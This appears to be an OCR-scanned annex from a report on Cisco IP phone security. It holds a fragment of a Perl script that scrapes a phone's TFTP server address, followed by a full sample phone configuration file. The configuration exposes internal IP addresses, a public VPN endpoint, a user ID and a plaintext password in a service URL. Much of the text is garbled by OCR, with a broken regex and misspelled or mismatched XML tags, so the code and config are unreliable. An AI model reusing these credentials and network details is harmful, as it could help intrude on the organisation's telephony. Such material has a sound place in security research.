elsif (Scontent_tftp =~ /TFTP Server 1:0\/Bx<\/TO=\Wi\Weotd width=20> AT W <TD5<B>([0-9. J4)<\/B> < \/TD=/)
%

$TFLp_server_IP = $1;

LTFTR;
¥
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Annex C- sample config file from a Cisco IP Phone

<?xml version="1.0" encoding="UTF-8"?>
<device xsi:type="axl:XIPPhone" ctiid="45" uuid="{9ab284d7-daab-925a-9640-
90f1a000c0d4}">

<fullConfig>true</fullConfig>
<deviceProtocol>SCCP</deviceProtocol>
<sshUserld></sshUserld>
<sshPassword></sshPassword>
<ipAddressMode>0</ipAddressMode>
<allowAutoConfig>true</allowAutoConfig>
<ipPreferenceModeControl>0</ipPreferenceModeControl>
<tzdata>
<tzolsonversion>2011h</tzolsonversion>
<tzupdater>tzupdater.jar</tzupdater>

</tzdata>

<devicePool uuid="{378ffb5b-fd1a-b02b-dbb6-cdb27ee13202}">
<revertPriority>0</revertPriority>
<name>DP_Headquarters_Video_MCU</name>
<dateTimeSetting uuid="{9ec4850a-7748-11d3-bdf0-00108302ead1}">
<name>CMLocal</name>
<dateTemplate>D-M-Y</dateTemplate>
<timeZone></timeZone>
<olsonTimeZone>Europe/Paris</olsonTimeZone>
<ntps>

<ntp>

<name>192.168.100.10</name>
<ntpMode>Directed Broadcast</ntpMode>
</ntp>

<ntp>

<name>192.168.100.24</name>
<ntpMode>Unicast</ntpMode>

</ntp>

<ntp>

<name>192.168.100.253</name>
<ntpMode>Directed Broadcast</ntpMode>
</ntp>

</ntps>

</dateTimeSetting>

<callManagerGroup>

<name>BCS</name>
<tftpDefault>true</tftpDefault>

<members>

<member priority="0">

<callManager>

<name>CUCM8</name>
<description>CUCM8</description>

<ports>
<ethernetPhonePort>2000</ethernetPhonePort>
<sipPort>5060</sipPort>
<securedSipPort>5061</securedSipPort>
<mgcpPorts>

<listen>2427</listen>
<keepAlive>2428</keepAlive>
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</mgcpPorts>

</ports>
<processNodeName>CUCM8</processNodeName>
</callManager>

</member>

</members>

</callManagerGroup>

<srstinfo uuid="{c6cba97c-3ae0-4cdc-86d7-3f285aacff05}">
<name>Routine</name>

<srstOption>User Specific</srstOption>
<userModifiable>true</userModifiable>
<ipAddr1>192.168.100.253</ipAddr1>
<port1>2000</port1>

<ipAddr2></ipAddr2>

<port2>2000</port2>

<ipAddr3></ipAddr3>

<port3>2000</port3>

<siplpAddrl></siplpAddrl>
<sipPort1>5060</sipPort1>
<siplpAddr2></siplpAddr2>
<sipPort2>5060</sipPort2>
<siplpAddr3></siplpAddr3>
<sipPort3>5060</sipPort3>
<isSecure>false</isSecure>

</srstinfo>
<mlppDomainld>000000</mlppDomainld>
<mlpplIndicationStatus>Off</mlpplIndicationStatus>
<preemption>Disabled</preemption>
<connectionMonitorDuration>120</connectionMonitorDuration>
</devicePool>

<TVS>

<members>

<member priority="0">

<port>2445</port>

<address>CUCM8</address>

</member>

</members>

</TVS>

<vpnGroup>

<mtu>1290</mtu>
<failConnectTime>30</failConnectTime>
<authMethod>0</authMethod>
<pswdPersistent>1</pswdPersistent>
<autoNetDetect>0</autoNetDetect>
<enableHostIDCheck>0</enableHostIDCheck>
<addresses>
<url1>https://195.101.175.26/phonevpn</url1>
</addresses>

<credentials>

<hashAlg>0</hashAlg>
<certHash1>EQVLYFYiODVY|WS7plAjU30EvQs=</certHash1>
</credentials>

</vpnGroup>
<MissedCallLoggingOption>10</MissedCallLoggingOption>
<commonProfile>
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<phonePassword></phonePassword>
<backgroundimageAccess>true</backgroundimageAccess>
<callLogBIfEnabled>2</callLogBIfEnabled>

</commonProfile>

<loadInformation>SCCP75.9-2-1S</loadInformation>

<vendorConfig>
<disableSpeaker>false</disableSpeaker><disableSpeakerAndHeadset>false</disableSpeak
erAndHeadset><forwardingDelay>1</forwardingDelay><pcPort>0</pcPort><garp>1</garp>
<voiceVlanAccess>0</voiceVlanAccess><videoCapability>1</videoCapability><autoSelectLi
neEnable>0</autoSelectLineEnable><spanToPCPort>1</spanToPCPort><loggingDisplay>1
</loggingDisplay><recordingTone>0</recordingTone><recordingToneLocalVolume>100</re
cordingTonelLocalVolume><recordingToneRemoteVolume>50</recordingToneRemoteVolum
e><recordingToneDuration></recordingToneDuration><displayOnWhenIncomingCall>0</dis
playOnWhenlncomingCall><moreKeyReversionTimer>5</moreKeyReversionTimer><autoC
allSelect>1</autoCallSelect><logServer></logServer><g722CodecSupport>0</g722CodecS
upport><headsetWidebandUIControl>0</headsetWidebandUIControl><headsetWidebandEn
able>0</headsetWidebandEnable><lldpAssetld></lldpAssetld><powerPriority>0</powerPrio
rity><ehookEnable>0</ehookEnable><ipv6LogServer></ipv6LogServer><detectCMConnecti
onFailure>0</detectCMConnectionFailure><minimumRingVolume>0</minimumRingVolume
><webProtocol>0</webProtocol><handsetHeadsetMonitor>0</handsetHeadsetMonitor><us
eEnblocDialing>1</useEnblocDialing></vendorConfig>

<commonConfig>
<bluetoothProfile>1</bluetoothProfile><ciscoCamera>1</ciscoCamera><videoCapability>1<
/videoCapability><eapAuthentication>1</eapAuthentication><webProtocol>0</webProtocol>
<webAccess>0</webAccess><sshAccess>1</sshAccess><applnstallFromAndroidMarket>tr
ue</applnstallFromAndroidMarket><presenceServerPri>192.168.100.8</presenceServerPri
><presenceServerType>1</presenceServerType></commonConfig>

<enterpriseConfig>
<ciscoCamera>1</ciscoCamera><videoCapability>1</videoCapability><webAccess>0</web
Access><rtcp>1</rtcp><peerFirmwareSharing>1</peerFirmwareSharing><webProtocol>0</
webProtocol></enterpriseConfig>
<versionStamp>1322487735-82fdecc1-468f-4719-9076-49db07415bae</versionStamp>
<userLocale>

<name>French_France</name>

<uid>2</uid>

<langCode>fr_FR</langCode>

<version></version>

<winCharSet>is0-8859-1</winCharSet>

</userLocale>

<networkLocale>United_States</networkLocale>

<networkLocalelnfo>

<name>United_States</name>

<uid>64</uid>

<version>8.5.0.0(1)</version>

</networkLocalelnfo>

<deviceSecurityMode>1</deviceSecurityMode>

<idleTimeout>0</idleTimeout>
<authenticationURL>http://CUCM8:8080/ccmcip/authenticate.jsp</authenticationURL>
<directoryURL>http://CUCMB8:8080/ccmcip/xmldirectory.jsp</directoryURL>
<idleURL></idleURL>
<informationURL>http://CUCMB8:8080/ccmcip/GetTelecasterHelpText.jsp</informationURL>
<messagesURL></messagesURL>

<proxyServerURL></proxyServerURL>
<servicesURL>http://CUCM8:8080/ccmcip/getservicesmenu.jsp</servicesURL>
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<secureAuthenticationURL>https://CUCMS8:8443/ccmcip/authenticate.jsp</secureAuthenticat
ionURL>
<secureDirectoryURL>https://CUCMB8:8443/ccmcip/xmldirectory.jsp</secureDirectoryURL>
<secureldleURL></secureldleURL>
<securelnformationURL>https://CUCM8:8443/ccmcip/GetTelecasterHelpText.jsp</securelnf
ormationURL>

<secureMessagesURL></secureMessagesURL>
<secureServicesURL>https://CUCM8:8443/ccmcip/getservicesmenu.jsp</secureServicesUR
L>

<dscpForSCCPPhoneConfig>96</dscpForSCCPPhoneConfig>
<dscpForSCCPPhoneServices>0</dscpForSCCPPhoneServices>
<dscpForCm2Dvce>96</dscpForCm2Dvce>
<transportLayerProtocol>1</transportLayerProtocol>
<dndCallAlert>5</dndCallAlert>
<phonePersonalization>1</phonePersonalization>

<rollover>0</rollover>

<singleButtonBarge>0</singleButtonBarge>
<joinAcrossLines>0</joinAcrossLines>
<autoCallPickupEnable>false</autoCallPickupEnable>
<blfAudibleAlertSettingOfldleStation>0</blfAudibleAlertSettingOfidle Station>
<blfAudibleAlertSettingOfBusyStation>0</blfAudibleAlertSettingOfBusyStation>
<capfAuthMode>0</capfAuthMode>

<capfList>

<capf>

<phonePort>3804</phonePort>
<processNodeName>CUCM8</processNodeName>

</capf>

</capfList>

<certHash>62d188d30fc647896ee5085726c6d55d</certHash>
<encrConfig>false</encrConfig>
<advertiseG722Codec>1</advertiseG722Codec>

<mobility>

<handoffdn>99</handoffdn>

<dtmfdn>0140033737</dtmfdn>

<ivrdn>3737</ivrdn>

<dtmfHoldCode>*81</dtmfHoldCode>
<dtmfExclusiveHoldCode>*82</dtmfExclusiveHoldCode>
<dtmfResumeCode>*83</dtmfResumeCode>
<dtmfTxfCode>*84</dtmfTxfCode>

<dtmfCnfCode>*85</dtmfCnfCode>

</mobility>

<userld>jldarbonnel</userld>

<phoneServices useHTTPS="true">

<provisioning>0</provisioning>

<phoneService type="1" category="0">

<name>Missed Calls</name>

<url>Application:Cisco/MissedCalls</url>

<vendor></vendor>

<version></version>

</phoneService>

<phoneService type="1" category="0">

<name>Received Calls</name>

<url>Application:Cisco/ReceivedCalls</url>

<vendor></vendor>

<version></version>
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</phoneService>

<phoneService type="1" category="0">

<name>Placed Calls</name>
<url>Application:Cisco/PlacedCalls</url>
<vendor></vendor>

<version></version>

</phoneService>

<phoneService type="1" category="0">

<name>Personal Directory</name>
<url>Application:Cisco/PersonalDirectory</url>
<vendor></vendor>

<version></version>

</phoneService>

<phoneService type="1" category="0">

<name>Corporate Directory</name>
<url>Application:Cisco/CorporateDirectory</url>
<vendor></vendor>

<version></version>

</phoneService>

<phoneService type="0" category="0">
<displayName>Cisco Unified MeetingPlace</displayName>
<name>Cisco Unified MeetingPlace</name>
<url>http://192.168.100.60/ipphone/MPAPI/ipphone/login?serverhost=192.168.100.60&amp;i
pphone=3733&amp;name=jldarbonnel&amp;wfpassword=12345</url>
<vendor></vendor>

<version></version>

</phoneService>

<phoneService type="0" category="0">
<displayName>PhoneMessenger</displayName>
<name>PhoneMessenger</name>
<url>http://cup8.fremecourt.com:8081/ippm/default?name=#DEVICENAME#</url>
<vendor></vendor>

<version></version>

</phoneService>

<phoneService type="0" category="0">
<displayName>Sytadin</displayName>
<name>ANDTEK</name>
<url>http://192.168.100.10/sytadin</url>
<vendor></vendor>

<version></version>

</phoneService>

<phoneService type="0" category="1">
<displayName>VisualVoicemail</displayName>
<name>VisualVoicemail</name>
<url>http://192.168.100.46/midlets/VisualVoicemail/VisualVoicemail.jad?call_connect_delay=
1000&amp;log_level=info&amp;voicemail_server=192.168.100.46</url>
<vendor>Cisco</vendor>

<version></version>

</phoneService>

</phoneServices>

</device>
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